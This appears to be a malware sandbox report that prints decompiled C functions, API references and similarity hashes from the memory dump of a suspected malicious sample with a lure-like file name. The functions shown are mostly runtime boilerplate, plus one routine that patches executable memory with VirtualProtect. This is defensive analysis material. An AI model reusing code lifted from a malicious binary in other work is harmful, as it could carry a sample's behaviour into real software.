                                                                0x0251acb4
                                                                0x0251acb9
                                                                0x0251acbe
                                                                0x0251acbe
                                                                0x0251acc4
                                                                0x0251acc7
                                                                0x0251acc7
                                                                0x0251acd8
                                                                0x0251acd8
                                                                0x0251acdf
                                                                0x0251ace2
                                                                0x0251ace5
                                                                0x0251acf2

                                                                APIs
                                                                • GetThreadLocale.KERNEL32(?,00000000,0251ACF3,?,?,00000000), ref: 0251AC74
                                                                  • Part of subcall function 0251A9D0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0251A9EE
                                                                • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0251ACF3,?,?,00000000), ref: 0251ACA4
                                                                • EnumCalendarInfoA.KERNEL32(Function_0000ABA8,00000000,00000000,00000004), ref: 0251ACAF
                                                                • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0251ACF3,?,?,00000000), ref: 0251ACCD
                                                                • EnumCalendarInfoA.KERNEL32(Function_0000ABE4,00000000,00000000,00000003), ref: 0251ACD8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Locale$InfoThread$CalendarEnum
                                                                • String ID:
                                                                • API String ID: 4102113445-0
                                                                • Opcode ID: 22b6483d715c2940c6f5542eacb17c26c1cfa2260e80e0d7b9254c402b4c5a46
                                                                • Instruction ID: d33b80311cfde1d780af3c5992d6e6f7606a56b474ada1686920775b1df01f00
                                                                • Opcode Fuzzy Hash: 22b6483d715c2940c6f5542eacb17c26c1cfa2260e80e0d7b9254c402b4c5a46
                                                                • Instruction Fuzzy Hash: 7E0126756016497FF203B774CD02F6F769EFB85724F600120F801A66C4DA689E01CAAC
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0251AD0C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 81%
                                                                			E0251AD0C(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				void* _t45;
				void* _t47;
				void* _t49;
				void* _t51;
				intOrPtr _t75;
				void* _t76;
				void* _t77;
				void* _t83;
				void* _t92;
				intOrPtr _t111;
				void* _t122;
				void* _t124;
				intOrPtr _t127;
				void* _t128;

				_t128 = __eflags;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t122 = __edx;
				_t124 = __eax;
				_push(_t127);
				_push(0x251aedc);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127;
				_t92 = 1;
				E025148A0(__edx);
				E0251A9D0(GetThreadLocale(), 0x251aef4, 0x1009,  &_v12);
				if(E02517DDC(0x251aef4, 1, _t128) + 0xfffffffd - 3 < 0) {
					while(1) {
						__eflags = _t92 - E02514B60(_t124);
						if(__eflags > 0) {
							goto L28;
						}
						asm("bt [0x252d82c], eax");
						if(__eflags >= 0) {
							_t45 = E02518340(_t124 + _t92 - 1, 2, 0x251aef8);
							__eflags = _t45;
							if(_t45 != 0) {
								_t47 = E02518340(_t124 + _t92 - 1, 4, 0x251af08);
								__eflags = _t47;
								if(_t47 != 0) {
									_t49 = E02518340(_t124 + _t92 - 1, 2, 0x251af20);
									__eflags = _t49;
									if(_t49 != 0) {
										_t51 = ( *(_t124 + _t92 - 1) & 0x000000ff) - 0x59;
										__eflags = _t51;
										if(_t51 == 0) {
											L24:
											E02514B6C(_t122, 0x251af38);
										} else {
											__eflags = _t51 != 0x20;
											if(_t51 != 0x20) {
												E02514A88();
												E02514B6C(_t122, _v24);
											} else {
												goto L24;
											}
										}
									} else {
										E02514B6C(_t122, 0x251af2c);
										_t92 = _t92 + 1;
									}
								} else {
									E02514B6C(_t122, 0x251af18);
									_t92 = _t92 + 3;
								}
							} else {
								E02514B6C(_t122, 0x251af04);
								_t92 = _t92 + 1;
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						} else {
							_v8 = E0251BCA8(_t124, _t92);
							E02514DC4(_t124, _v8, _t92,  &_v20);
							E02514B6C(_t122, _v20);
							_t92 = _t92 + _v8;
						}
					}
				} else {
					_t75 =  *0x256c8c8; // 0x9
					_t76 = _t75 - 4;
					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
						_t77 = 1;
					} else {
						_t77 = 0;
					}
					if(_t77 == 0) {
						E025148F4(_t122, _t124);
					} else {
						while(_t92 <= E02514B60(_t124)) {
							_t83 = ( *(_t124 + _t92 - 1) & 0x000000ff) - 0x47;
							__eflags = _t83;
							if(_t83 != 0) {
								__eflags = _t83 != 0x20;
								if(_t83 != 0x20) {
									E02514A88();
									E02514B6C(_t122, _v16);
								}
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						}
					}
				}
				L28:
				_pop(_t111);
				 *[fs:eax] = _t111;
				_push(E0251AEE3);
				return E025148C4( &_v24, 4);
			}






















                                                                0x0251ad0c
                                                                0x0251ad11
                                                                0x0251ad12
                                                                0x0251ad13
                                                                0x0251ad14
                                                                0x0251ad15
                                                                0x0251ad19
                                                                0x0251ad1b
                                                                0x0251ad1f
                                                                0x0251ad20
                                                                0x0251ad25
                                                                0x0251ad28
                                                                0x0251ad2b
                                                                0x0251ad32
                                                                0x0251ad4a
                                                                0x0251ad62
                                                                0x0251aeb2
                                                                0x0251aeb9
                                                                0x0251aebb
                                                                0x00000000
                                                                0x00000000
                                                                0x0251add1
                                                                0x0251add8
                                                                0x0251ae16
                                                                0x0251ae1b
                                                                0x0251ae1d
                                                                0x0251ae3f
                                                                0x0251ae44
                                                                0x0251ae46
                                                                0x0251ae67
                                                                0x0251ae6c
                                                                0x0251ae6e
                                                                0x0251ae84
                                                                0x0251ae84
                                                                0x0251ae86
                                                                0x0251ae8c
                                                                0x0251ae93
                                                                0x0251ae88
                                                                0x0251ae88
                                                                0x0251ae8a
                                                                0x0251aea2
                                                                0x0251aeac
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0251ae8a
                                                                0x0251ae70
                                                                0x0251ae77
                                                                0x0251ae7c
                                                                0x0251ae7c
                                                                0x0251ae48
                                                                0x0251ae4f
                                                                0x0251ae54
                                                                0x0251ae54
                                                                0x0251ae1f
                                                                0x0251ae26
                                                                0x0251ae2b
                                                                0x0251ae2b
                                                                0x0251aeb1
                                                                0x0251aeb1
                                                                0x0251adda
                                                                0x0251ade3
                                                                0x0251adf1
                                                                0x0251adfb
                                                                0x0251ae00
                                                                0x0251ae00
                                                                0x0251add8
                                                                0x0251ad68
                                                                0x0251ad68
                                                                0x0251ad6d
                                                                0x0251ad70
                                                                0x0251ad7e
                                                                0x0251ad7a
                                                                0x0251ad7a
                                                                0x0251ad7a
                                                                0x0251ad82
                                                                0x0251adbf
                                                                0x0251ad84
                                                                0x0251adab
                                                                0x0251ad8b
                                                                0x0251ad8b
                                                                0x0251ad8d
                                                                0x0251ad8f
                                                                0x0251ad91
                                                                0x0251ad9b
                                                                0x0251ada5
                                                                0x0251ada5
                                                                0x0251ad91
                                                                0x0251adaa
                                                                0x0251adaa
                                                                0x0251adaa
                                                                0x0251adb6
                                                                0x0251ad82
                                                                0x0251aec1
                                                                0x0251aec3
                                                                0x0251aec6
                                                                0x0251aec9
                                                                0x0251aedb

                                                                APIs
                                                                • GetThreadLocale.KERNEL32(?,00000000,0251AEDC,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0251AD3B
                                                                  • Part of subcall function 0251A9D0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0251A9EE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Locale$InfoThread
                                                                • String ID: eeee$ggg$yyyy
                                                                • API String ID: 4232894706-1253427255
                                                                • Opcode ID: 88a4aae3b296346a71fff721e885c762f8d46c89103a9527b45b14df04a1d4c8
                                                                • Instruction ID: b9a049a8e01fb94e1733787926ea23572d45258abc0275caa0e78a248e18c1d0
                                                                • Opcode Fuzzy Hash: 88a4aae3b296346a71fff721e885c762f8d46c89103a9527b45b14df04a1d4c8
                                                                • Instruction Fuzzy Hash: CA41F2757016064BFB13AAB8C8942BEB6EBFBC5300B544A26D4D1C7348DA34DD06CA6D
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0251C608 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E0251C608() {
				_Unknown_base(*)()* _t1;
				struct HINSTANCE__* _t3;

				_t1 = GetModuleHandleA("kernel32.dll");
				_t3 = _t1;
				if(_t3 != 0) {
					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
					 *0x252d850 = _t1;
				}
				if( *0x252d850 == 0) {
					 *0x252d850 = E02518254;
					return E02518254;
				}
				return _t1;
			}





                                                                0x0251c60e
                                                                0x0251c613
                                                                0x0251c617
                                                                0x0251c61f
                                                                0x0251c624
                                                                0x0251c624
                                                                0x0251c630
                                                                0x0251c637
                                                                0x00000000
                                                                0x0251c637
                                                                0x0251c63d

                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,?,0252C10B,00000000,0252C11E), ref: 0251C60E
                                                                • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0251C61F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressHandleModuleProc
                                                                • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                • API String ID: 1646373207-3712701948
                                                                • Opcode ID: 2438caa8d3243b88ff90eb033844d2a762197518090e3a77eacc0405be627b9f
                                                                • Instruction ID: d1541996c1fbaf96262189df03a0abf201e2a014f739d96eb1ba7c021e4a6256
                                                                • Opcode Fuzzy Hash: 2438caa8d3243b88ff90eb033844d2a762197518090e3a77eacc0405be627b9f
                                                                • Instruction Fuzzy Hash: FAD05EA0BC13825AF7206EA89494B0537E8B3456A2F12292AE01255240C761881C9B0D
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0251E32C Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 82%
                                                                			E0251E32C(signed short* __eax) {
				char _v260;
				char _v768;
				char _v772;
				signed short* _v776;
				signed short* _v780;
				char _v784;
				signed int _v788;
				char _v792;
				intOrPtr* _v796;
				signed char _t43;
				intOrPtr* _t60;
				void* _t79;
				void* _t81;
				void* _t84;
				void* _t85;
				intOrPtr* _t92;
				void* _t96;
				char* _t97;
				void* _t98;

				_v776 = __eax;
				if((_v776[0] & 0x00000020) == 0) {
					E0251E20C(0x80070057);
				}
				_t43 =  *_v776 & 0x0000ffff;
				if((_t43 & 0x00000fff) == 0xc) {
					if((_t43 & 0x00000040) == 0) {
						_v780 = _v776[4];
					} else {
						_v780 =  *(_v776[4]);
					}
					_v788 =  *_v780 & 0x0000ffff;
					_t79 = _v788 - 1;
					if(_t79 >= 0) {
						_t85 = _t79 + 1;
						_t96 = 0;
						_t97 =  &_v772;
						do {
							_v796 = _t97;
							_push(_v796 + 4);
							_t22 = _t96 + 1; // 0x1
							_push(_v780);
							L0251D42C();
							E0251E20C(_v780);
							_push( &_v784);
							_t25 = _t96 + 1; // 0x1
							_push(_v780);
							L0251D434();
							E0251E20C(_v780);
							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
							_t96 = _t96 + 1;
							_t97 = _t97 + 8;
							_t85 = _t85 - 1;
						} while (_t85 != 0);
					}
					_t81 = _v788 - 1;
					if(_t81 >= 0) {
						_t84 = _t81 + 1;
						_t60 =  &_v768;
						_t92 =  &_v260;
						do {
							 *_t92 =  *_t60;
							_t92 = _t92 + 4;
							_t60 = _t60 + 8;
							_t84 = _t84 - 1;
						} while (_t84 != 0);
						do {
							goto L12;
						} while (E0251E2D0(_t83, _t98) != 0);
						goto L15;
					}
					L12:
					_t83 = _v788 - 1;
					if(E0251E2A0(_v788 - 1, _t98) != 0) {
						_push( &_v792);
						_push( &_v260);
						_push(_v780);
						L0251D43C();
						E0251E20C(_v780);
						E0251E524(_v792);
					}
				}
				L15:
				_push(_v776);
				L0251CFC4();
				return E0251E20C(_v776);
			}






















                                                                0x0251e338
                                                                0x0251e348
                                                                0x0251e34f
                                                                0x0251e34f
                                                                0x0251e35a
                                                                0x0251e368
                                                                0x0251e377
                                                                0x0251e395
                                                                0x0251e379
                                                                0x0251e384
                                                                0x0251e384
                                                                0x0251e3a4
                                                                0x0251e3b0
                                                                0x0251e3b3
                                                                0x0251e3b5
                                                                0x0251e3b6
                                                                0x0251e3b8
                                                                0x0251e3be
                                                                0x0251e3c0
                                                                0x0251e3cf
                                                                0x0251e3d0
                                                                0x0251e3da
                                                                0x0251e3db
                                                                0x0251e3e0
                                                                0x0251e3eb
                                                                0x0251e3ec
                                                                0x0251e3f6
                                                                0x0251e3f7
                                                                0x0251e3fc
                                                                0x0251e417
                                                                0x0251e419
                                                                0x0251e41a
                                                                0x0251e41d
                                                                0x0251e41d
                                                                0x0251e3be
                                                                0x0251e426
                                                                0x0251e429
                                                                0x0251e42b
                                                                0x0251e42c
                                                                0x0251e432
                                                                0x0251e438
                                                                0x0251e43a
                                                                0x0251e43c
                                                                0x0251e43f
                                                                0x0251e442
                                                                0x0251e442
                                                                0x0251e445
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0251e445
                                                                0x0251e445
                                                                0x0251e44c
                                                                0x0251e457
                                                                0x0251e45f
                                                                0x0251e466
                                                                0x0251e46d
                                                                0x0251e46e
                                                                0x0251e473
                                                                0x0251e47e
                                                                0x0251e47e
                                                                0x0251e48c
                                                                0x0251e490
                                                                0x0251e496
                                                                0x0251e497
                                                                0x0251e4a7

                                                                APIs
                                                                • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0251E3DB
                                                                • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0251E3F7
                                                                • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0251E46E
                                                                • VariantClear.OLEAUT32(?), ref: 0251E497
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                • String ID:
                                                                • API String ID: 920484758-0
                                                                • Opcode ID: 88686fe7731b7c03f03ace40aaed8d38b50d90d6747c96ad40a312f6e176089f
                                                                • Instruction ID: 81706893528035906b3761cf227f8adb6d55b1cda81150aa0765120506228a38
                                                                • Opcode Fuzzy Hash: 88686fe7731b7c03f03ace40aaed8d38b50d90d6747c96ad40a312f6e176089f
                                                                • Instruction Fuzzy Hash: BC414A75A0122E8FDB66DF58C892BC9B7FDBF88300F0041D5E949A7211DA74AF808F58
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0251AF48 Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E0251AF48(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				void* _t73;
				intOrPtr _t74;
				intOrPtr _t83;
				intOrPtr _t86;
				intOrPtr* _t87;
				void* _t93;

				_t93 = __fp0;
				_v8 = __ecx;
				_t73 = __edx;
				_t87 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
					_t40 =  *0x256c7f0; // 0x2510000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E0251AF3C(_t73);
				} else {
					_v12 = _t73 - _v820.AllocationBase;
				}
				E0251830C( &_v273, 0x104, E0251BDF0( &_v534, 0x5c) + 1);
				_t74 = 0x251b0c8;
				_t86 = 0x251b0c8;
				_t83 =  *0x2516d7c; // 0x2516dc8
				if(E02513DEC(_t87, _t83) != 0) {
					_t74 = E02514D64( *((intOrPtr*)(_t87 + 4)));
					_t69 = E025182E4(_t74, 0x251b0c8);
					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
						_t86 = 0x251b0cc;
					}
				}
				_t51 =  *0x2569dd0; // 0x2516b64
				_t16 = _t51 + 4; // 0xffe8
				_t53 =  *0x256c7f0; // 0x2510000
				LoadStringA(E02515AF0(_t53),  *_t16,  &_v790, 0x100);
				E02513BD8( *_t87,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t74;
				_v832 = 6;
				_v828 = _t86;
				_v824 = 6;
				E0251882C(_v8,  &_v790, _a4, _t93, 4,  &_v860);
				return E025182E4(_v8, _t86);
			}































                                                                0x0251af48
                                                                0x0251af54
                                                                0x0251af57
                                                                0x0251af59
                                                                0x0251af65
                                                                0x0251af74
                                                                0x0251af9e
                                                                0x0251afa4
                                                                0x0251afb0
                                                                0x0251afb5
                                                                0x0251afbb
                                                                0x0251afbb
                                                                0x0251afd9
                                                                0x0251afde
                                                                0x0251afe3
                                                                0x0251afea
                                                                0x0251aff7
                                                                0x0251b001
                                                                0x0251b005
                                                                0x0251b00c
                                                                0x0251b015
                                                                0x0251b015
                                                                0x0251b00c
                                                                0x0251b026
                                                                0x0251b02b
                                                                0x0251b02f
                                                                0x0251b03a
                                                                0x0251b047
                                                                0x0251b052
                                                                0x0251b058
                                                                0x0251b065
                                                                0x0251b06b
                                                                0x0251b075
                                                                0x0251b07b
                                                                0x0251b082
                                                                0x0251b088
                                                                0x0251b08f
                                                                0x0251b095
                                                                0x0251b0b1
                                                                0x0251b0c4

                                                                APIs
                                                                • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0251AF65
                                                                • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0251AF89
                                                                • GetModuleFileNameA.KERNEL32(02510000,?,00000105), ref: 0251AFA4
                                                                • LoadStringA.USER32 ref: 0251B03A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileModuleName$LoadQueryStringVirtual
                                                                • String ID:
                                                                • API String ID: 3990497365-0
                                                                • Opcode ID: 39b36cb49c7ca855c1a2a83b57d21c7731212e21a8d75131946c670e1e36853b
                                                                • Instruction ID: 8086645cd369928906222f28ee71a668b588fc6ebfee8896df596fdaea2f936f
                                                                • Opcode Fuzzy Hash: 39b36cb49c7ca855c1a2a83b57d21c7731212e21a8d75131946c670e1e36853b
                                                                • Instruction Fuzzy Hash: 97412B71A402599BEB21DB68CC84BDAB7FDBB48304F0444E6E548E7241D7749F88CF58
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0251AF46 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E0251AF46(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				void* _t74;
				intOrPtr _t75;
				intOrPtr _t85;
				intOrPtr _t89;
				intOrPtr* _t92;
				void* _t105;

				_v8 = __ecx;
				_t74 = __edx;
				_t92 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
					_t40 =  *0x256c7f0; // 0x2510000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E0251AF3C(_t74);
				} else {
					_v12 = _t74 - _v820.AllocationBase;
				}
				E0251830C( &_v273, 0x104, E0251BDF0( &_v534, 0x5c) + 1);
				_t75 = 0x251b0c8;
				_t89 = 0x251b0c8;
				_t85 =  *0x2516d7c; // 0x2516dc8
				if(E02513DEC(_t92, _t85) != 0) {
					_t75 = E02514D64( *((intOrPtr*)(_t92 + 4)));
					_t69 = E025182E4(_t75, 0x251b0c8);
					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
						_t89 = 0x251b0cc;
					}
				}
				_t51 =  *0x2569dd0; // 0x2516b64
				_t16 = _t51 + 4; // 0xffe8
				_t53 =  *0x256c7f0; // 0x2510000
				LoadStringA(E02515AF0(_t53),  *_t16,  &_v790, 0x100);
				E02513BD8( *_t92,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t75;
				_v832 = 6;
				_v828 = _t89;
				_v824 = 6;
				E0251882C(_v8,  &_v790, _a4, _t105, 4,  &_v860);
				return E025182E4(_v8, _t89);
			}































                                                                0x0251af54
                                                                0x0251af57
                                                                0x0251af59
                                                                0x0251af65
                                                                0x0251af74
                                                                0x0251af9e
                                                                0x0251afa4
                                                                0x0251afb0
                                                                0x0251afb5
                                                                0x0251afbb
                                                                0x0251afbb
                                                                0x0251afd9
                                                                0x0251afde
                                                                0x0251afe3
                                                                0x0251afea
                                                                0x0251aff7
                                                                0x0251b001
                                                                0x0251b005
                                                                0x0251b00c
                                                                0x0251b015
                                                                0x0251b015
                                                                0x0251b00c
                                                                0x0251b026
                                                                0x0251b02b
                                                                0x0251b02f
                                                                0x0251b03a
                                                                0x0251b047
                                                                0x0251b052
                                                                0x0251b058
                                                                0x0251b065
                                                                0x0251b06b
                                                                0x0251b075
                                                                0x0251b07b
                                                                0x0251b082
                                                                0x0251b088
                                                                0x0251b08f
                                                                0x0251b095
                                                                0x0251b0b1
                                                                0x0251b0c4

                                                                APIs
                                                                • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0251AF65
                                                                • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0251AF89
                                                                • GetModuleFileNameA.KERNEL32(02510000,?,00000105), ref: 0251AFA4
                                                                • LoadStringA.USER32 ref: 0251B03A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileModuleName$LoadQueryStringVirtual
                                                                • String ID:
                                                                • API String ID: 3990497365-0
                                                                • Opcode ID: 1888ee703cce4ff2d4e0ad7abb3b5035c829ad7886f4ae1b003a3265b55815e9
                                                                • Instruction ID: 4c1f0d4f5ca976b4c274cd5b356d42e20eb73201aea532e372704185345c8970
                                                                • Opcode Fuzzy Hash: 1888ee703cce4ff2d4e0ad7abb3b5035c829ad7886f4ae1b003a3265b55815e9
                                                                • Instruction Fuzzy Hash: 41412A71A402599BEB21DB68CC84BDAB7FDBB48304F0444E6E548E7241D7749F88CF58
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0252365C Relevance: 6.0, APIs: 4, Instructions: 35memoryCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 87%
                                                                			E0252365C(void* __eax, long __ecx, void* __edx) {
				long _v16;
				void* __ebx;
				int _t3;
				void* _t8;
				void* _t14;
				long _t15;
				DWORD* _t16;

				_push(__ecx);
				_t15 = __ecx;
				_t14 = __edx;
				_t8 = __eax;
				_t3 = VirtualProtect(__eax, __ecx, 0x40, _t16);
				if(_t3 != 0) {
					E02512DC8(_t14, _t8, _t15, _t8);
					FlushInstructionCache(GetCurrentProcess(), _t8, _t15);
					_t3 = VirtualProtect(_t8, _t15, _v16, _t16);
				}
				return _t3;
			}










                                                                0x0252365f
                                                                0x02523660
                                                                0x02523662
                                                                0x02523664
                                                                0x0252366b
                                                                0x02523672
                                                                0x0252367b
                                                                0x02523688
                                                                0x02523695
                                                                0x02523695
                                                                0x0252369e

                                                                APIs
                                                                • VirtualProtect.KERNEL32(00000000,00000005,00000040,?,00000005,?,00000000,02516A0B,025236C5), ref: 0252366B
                                                                • GetCurrentProcess.KERNEL32(00000000,00000005,00000000,00000005,00000040,?,00000005,?,00000000,02516A0B,025236C5), ref: 02523682
                                                                • FlushInstructionCache.KERNEL32(00000000,00000000,00000005,00000000,00000005,00000040,?,00000005,?,00000000,02516A0B,025236C5), ref: 02523688
                                                                • VirtualProtect.KERNEL32(00000000,00000005,025236C5,?,00000000,00000000,00000005,00000000,00000005,00000040,?,00000005,?,00000000,02516A0B,025236C5), ref: 02523695
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ProtectVirtual$CacheCurrentFlushInstructionProcess
                                                                • String ID:
                                                                • API String ID: 4115577372-0
                                                                • Opcode ID: 9d93ba61a1ffc6d22192cd6e55df1b3d5b6bdb4c55d542b4732a858bdd434914
                                                                • Instruction ID: 1efe602ffa65b49d862920ffcd6b849ad835661119e09d4b3ca45af6ed0b3f98
                                                                • Opcode Fuzzy Hash: 9d93ba61a1ffc6d22192cd6e55df1b3d5b6bdb4c55d542b4732a858bdd434914
                                                                • Instruction Fuzzy Hash: 28E086A630222137B624317BDCC4DAB5ECEEFC67B1B100435B60CD3240D928DC0288BD
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02511C9C Relevance: 5.3, APIs: 4, Instructions: 330COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 93%
                                                                			E02511C9C(signed int __eax, signed int __edx, void* __edi) {
				signed int _t58;
				signed int _t73;
				signed int _t80;
				signed int _t86;
				signed int _t94;
				signed int _t100;
				void* _t102;
				signed int _t111;
				signed int _t119;
				signed int _t125;
				signed int _t131;
				signed int _t133;
				signed int _t136;
				intOrPtr _t139;
				void* _t141;
				signed int _t143;
				signed int _t145;
				unsigned int _t146;
				signed int _t153;
				unsigned int _t154;
				intOrPtr _t157;
				void* _t160;
				intOrPtr _t168;
				intOrPtr _t170;
				signed int _t173;
				signed int _t174;
				signed int _t175;
				void* _t182;
